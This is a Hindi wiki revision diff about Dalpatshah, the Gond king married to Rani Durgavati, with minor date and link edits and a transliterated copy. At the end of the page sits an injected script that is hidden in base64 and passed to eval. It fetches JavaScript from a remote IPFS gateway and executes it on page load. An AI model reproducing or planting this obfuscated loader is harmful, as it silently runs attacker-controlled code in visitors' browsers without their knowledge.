Difference between revisions of "दलपतशाह"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
'''दलपतशाह''' अथवा 'दलपतिशाह' [[गोंड]] राजा संग्राम शाह के सबसे बड़े पुत्र थे। इनका [[विवाह संस्कार|विवाह]] [[भारतीय इतिहास]] की वीरांगना नारियों में गिनी जाने वाली [[रानी दुर्गावती|दुर्गावती]] से हुआ था।
+
'''दलपतशाह''' अथवा 'दलपतिशाह' [[गोंड]] राजा संग्राम शाह के सबसे बड़े पुत्र थे। इनका [[विवाह संस्कार|विवाह]] [[भारतीय इतिहास]] की वीरांगना नारियों में गिनी जाने वाली [[रानी दुर्गावती]] से हुआ था।
  
 
*दलपतशाह राजा संग्राम शाह के सबसे बड़े पुत्र थे।
 
*दलपतशाह राजा संग्राम शाह के सबसे बड़े पुत्र थे।
*1540 में संग्राम शाह की मृत्यु के पश्चात दलपतशाह राजा हुए।
+
*1540 ई. में संग्राम शाह की मृत्यु के पश्चात दलपतशाह राजा हुए।
*राजा दलपतशाह का विवाह 1542 में दुर्गावती से हुआ था।
+
*राजा दलपतशाह का विवाह 1542 ई. में दुर्गावती से हुआ था।
 
*दलपतशाह की [[रानी दुर्गावती]] उनके साथ राज्य के प्रशासन और विस्तार में सक्रिय भागीदारी निभाने लगी थीं।
 
*दलपतशाह की [[रानी दुर्गावती]] उनके साथ राज्य के प्रशासन और विस्तार में सक्रिय भागीदारी निभाने लगी थीं।
*दुर्भाग्य से कुछ वर्षों में ही दलपतशाह की मृत्यु हो गयी। उस समय उनके पुत्र वीरनारायण बहुत छोटे थे, ऐसे में रानी दुर्गावती को राजगद्दी संभालनी पड़ी।
+
*दुर्भाग्य से कुछ [[वर्ष|वर्षों]] में ही दलपतशाह की मृत्यु हो गयी। उस समय उनके पुत्र वीरनारायण बहुत छोटे थे, ऐसे में रानी दुर्गावती को राजगद्दी संभालनी पड़ी।
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}

Revision as of 13:29, 24 December 2014

dalapatashah athava 'dalapatishah' goand raja sangram shah ke sabase b de putr the. inaka vivah bharatiy itihas ki viraangana nariyoan mean gini jane vali rani durgavati se hua tha.

  • dalapatashah raja sangram shah ke sabase b de putr the.
  • 1540 ee. mean sangram shah ki mrityu ke pashchat dalapatashah raja hue.
  • raja dalapatashah ka vivah 1542 ee. mean durgavati se hua tha.
  • dalapatashah ki rani durgavati unake sath rajy ke prashasan aur vistar mean sakriy bhagidari nibhane lagi thian.
  • durbhagy se kuchh varshoan mean hi dalapatashah ki mrityu ho gayi. us samay unake putr viranarayan bahut chhote the, aise mean rani durgavati ko rajagaddi sanbhalani p di.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>